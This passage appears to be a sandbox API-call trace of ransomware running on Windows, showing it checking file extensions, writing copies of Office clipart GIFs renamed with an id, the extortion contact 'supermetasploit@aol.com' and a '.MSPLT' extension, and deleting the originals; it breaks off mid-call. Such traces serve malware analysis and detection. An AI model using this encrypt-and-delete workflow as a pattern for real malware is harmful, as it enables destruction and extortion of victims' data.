[0185.806] ReadFile (in: hFile=0x384, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0185.806] WriteFile (in: hFile=0x350, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0185.806] SetEndOfFile (hFile=0x350) returned 1 [0185.807] CloseHandle (hObject=0x350) returned 1 [0185.808] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.808] SetEndOfFile (hFile=0x384) returned 1 [0185.809] CloseHandle (hObject=0x384) returned 1 [0185.809] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.810] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00120_.gif")) returned 1 [0185.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.810] lstrlenW (lpString=".doc") returned 4 [0185.811] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.811] lstrlenW (lpString=".docx") returned 5 [0185.811] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.811] lstrlenW (lpString=".pdf") returned 4 [0185.811] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.811] lstrlenW (lpString=".xls") returned 4 [0185.811] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.811] lstrlenW (lpString=".xlsx") returned 5 [0185.811] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.811] lstrlenW (lpString=".ppt") returned 4 [0185.811] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.811] lstrlenW (lpString=".zip") returned 4 [0185.811] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.811] lstrlenW (lpString=".rar") returned 4 [0185.811] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.811] lstrlenW (lpString=".bz2") returned 4 [0185.811] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.811] lstrlenW (lpString=".7z") returned 3 [0185.811] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.811] lstrlenW (lpString=".dbf") returned 4 [0185.811] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.811] lstrlenW (lpString=".1cd") returned 4 [0185.811] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.812] lstrlenW (lpString=".jpg") returned 4 [0185.812] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.812] lstrlenW (lpString=".doc") returned 4 [0185.812] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.812] lstrlenW (lpString=".docx") returned 5 [0185.812] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.812] lstrlenW (lpString=".pdf") returned 4 [0185.812] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.812] lstrlenW (lpString=".xls") returned 4 [0185.812] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.812] lstrlenW (lpString=".xlsx") returned 5 [0185.812] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.812] lstrlenW (lpString=".ppt") returned 4 [0185.812] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.812] lstrlenW (lpString=".zip") returned 4 [0185.812] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.812] lstrlenW (lpString=".rar") returned 4 [0185.812] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.812] lstrlenW (lpString=".bz2") returned 4 [0185.812] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.812] lstrlenW (lpString=".7z") returned 3 [0185.812] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.813] lstrlenW (lpString=".dbf") returned 4 [0185.813] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.813] lstrlenW (lpString=".1cd") returned 4 [0185.813] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.813] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 68 [0185.813] lstrlenW (lpString=".jpg") returned 4 [0185.813] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.813] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.813] lstrlenW (lpString="AG00130_.GIF") returned 12 [0185.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0185.815] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=5253) returned 1 [0185.816] CloseHandle (hObject=0x350) returned 1 [0185.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif")) returned 0x220 [0185.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0185.818] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.818] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0185.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0185.818] GetLastError () returned 0x0 [0185.818] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x1485, lpOverlapped=0x0) returned 1 [0186.249] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x1490, lpOverlapped=0x0) returned 1 [0186.251] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0186.251] WriteFile (in: hFile=0x2fc, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0186.251] SetEndOfFile (hFile=0x2fc) returned 1 [0186.251] CloseHandle (hObject=0x2fc) returned 1 [0186.252] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.252] SetEndOfFile (hFile=0x358) returned 1 [0186.253] CloseHandle (hObject=0x358) returned 1 [0186.254] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.256] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00130_.gif")) returned 1 [0186.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.257] lstrlenW (lpString=".doc") returned 4 [0186.257] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.257] lstrlenW (lpString=".docx") returned 5 [0186.257] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.257] lstrlenW (lpString=".pdf") returned 4 [0186.257] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.267] lstrlenW (lpString=".xls") returned 4 [0186.267] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.267] lstrlenW (lpString=".xlsx") returned 5 [0186.267] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.267] lstrlenW (lpString=".ppt") returned 4 [0186.268] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.268] lstrlenW (lpString=".zip") returned 4 [0186.268] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.268] lstrlenW (lpString=".rar") returned 4 [0186.268] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.268] lstrlenW (lpString=".bz2") returned 4 [0186.268] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.268] lstrlenW (lpString=".7z") returned 3 [0186.268] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.268] lstrlenW (lpString=".dbf") returned 4 [0186.268] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.268] lstrlenW (lpString=".1cd") returned 4 [0186.268] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.268] lstrlenW (lpString=".jpg") returned 4 [0186.268] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.268] lstrlenW (lpString=".doc") returned 4 [0186.268] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.268] lstrlenW (lpString=".docx") returned 5 [0186.268] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.268] lstrlenW (lpString=".pdf") returned 4 [0186.269] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.269] lstrlenW (lpString=".xls") returned 4 [0186.269] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.269] lstrlenW (lpString=".xlsx") returned 5 [0186.269] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.269] lstrlenW (lpString=".ppt") returned 4 [0186.269] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.269] lstrlenW (lpString=".zip") returned 4 [0186.269] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.269] lstrlenW (lpString=".rar") returned 4 [0186.269] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.269] lstrlenW (lpString=".bz2") returned 4 [0186.269] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.269] lstrlenW (lpString=".7z") returned 3 [0186.269] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.269] lstrlenW (lpString=".dbf") returned 4 [0186.269] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.269] lstrlenW (lpString=".1cd") returned 4 [0186.269] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 68 [0186.269] lstrlenW (lpString=".jpg") returned 4 [0186.269] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.270] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.270] lstrlenW (lpString="AG00154_.GIF") returned 12 [0186.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.308] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=5315) returned 1 [0186.308] CloseHandle (hObject=0x38c) returned 1 [0186.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif")) returned 0x220 [0186.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0186.308] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.309] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0186.319] GetLastError () returned 0x0 [0186.320] ReadFile (in: hFile=0x38c, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x14c3, lpOverlapped=0x0) returned 1 [0186.417] WriteFile (in: hFile=0x37c, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x14d0, lpOverlapped=0x0) returned 1 [0186.419] ReadFile (in: hFile=0x38c, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0186.419] WriteFile (in: hFile=0x37c, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0xec, lpOverlapped=0x0) returned 1 [0186.419] SetEndOfFile (hFile=0x37c) returned 1 [0186.419] CloseHandle (hObject=0x37c) returned 1 [0186.420] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.420] SetEndOfFile (hFile=0x38c) returned 1 [0186.421] CloseHandle (hObject=0x38c) returned 1 [0186.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.422] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00154_.gif")) returned 1 [0186.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.427] lstrlenW (lpString=".doc") returned 4 [0186.427] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.427] lstrlenW (lpString=".docx") returned 5 [0186.427] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.427] lstrlenW (lpString=".pdf") returned 4 [0186.427] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.427] lstrlenW (lpString=".xls") returned 4 [0186.427] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.427] lstrlenW (lpString=".xlsx") returned 5 [0186.427] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.427] lstrlenW (lpString=".ppt") returned 4 [0186.427] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.427] lstrlenW (lpString=".zip") returned 4 [0186.427] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.427] lstrlenW (lpString=".rar") returned 4 [0186.427] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.427] lstrlenW (lpString=".bz2") returned 4 [0186.427] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.427] lstrlenW (lpString=".7z") returned 3 [0186.428] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.428] lstrlenW (lpString=".dbf") returned 4 [0186.428] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.428] lstrlenW (lpString=".1cd") returned 4 [0186.428] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.428] lstrlenW (lpString=".jpg") returned 4 [0186.428] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.428] lstrlenW (lpString=".doc") returned 4 [0186.428] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.428] lstrlenW (lpString=".docx") returned 5 [0186.428] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.428] lstrlenW (lpString=".pdf") returned 4 [0186.428] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.428] lstrlenW (lpString=".xls") returned 4 [0186.428] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.428] lstrlenW (lpString=".xlsx") returned 5 [0186.428] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.428] lstrlenW (lpString=".ppt") returned 4 [0186.428] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.428] lstrlenW (lpString=".zip") returned 4 [0186.428] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0186.429] lstrlenW (lpString=".rar") returned 4 [0186.429] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0186.429] lstrlenW (lpString=".bz2") returned 4 [0186.429] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0186.429] lstrlenW (lpString=".7z") returned 3 [0186.429] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0186.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.429] lstrlenW (lpString=".dbf") returned 4 [0186.429] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0186.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.429] lstrlenW (lpString=".1cd") returned 4 [0186.429] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0186.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 68 [0186.429] lstrlenW (lpString=".jpg") returned 4 [0186.429] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0186.429] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0186.430] lstrlenW (lpString="AG00158_.GIF") returned 12 [0186.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0186.431] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x2aeff14 | out: lpFileSize=0x2aeff14*=5030) returned 1 [0186.431] CloseHandle (hObject=0x37c) returned 1 [0186.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif")) returned 0x220 [0186.432] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0186.438] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.438] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aefec0 | out: lpNewFilePointer=0x0) returned 1 [0186.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00158_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00158_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0186.442] GetLastError () returned 0x0 [0186.443] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x13a6, lpOverlapped=0x0) returned 1 [0186.489] WriteFile (in: hFile=0x368, lpBuffer=0x2fc7020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x2aefc94, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesWritten=0x2aefc94*=0x13b0, lpOverlapped=0x0) returned 1 [0186.490] ReadFile (in: hFile=0x358, lpBuffer=0x2fc7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aefecc, lpOverlapped=0x0 | out: lpBuffer=0x2fc7020*, lpNumberOfBytesRead=0x2aefecc*=0x0, lpOverlapped=0x0) returned 1 [0186.490] WriteFile (in: hFile=0x368, lpBuffer=0x2fc7020*, 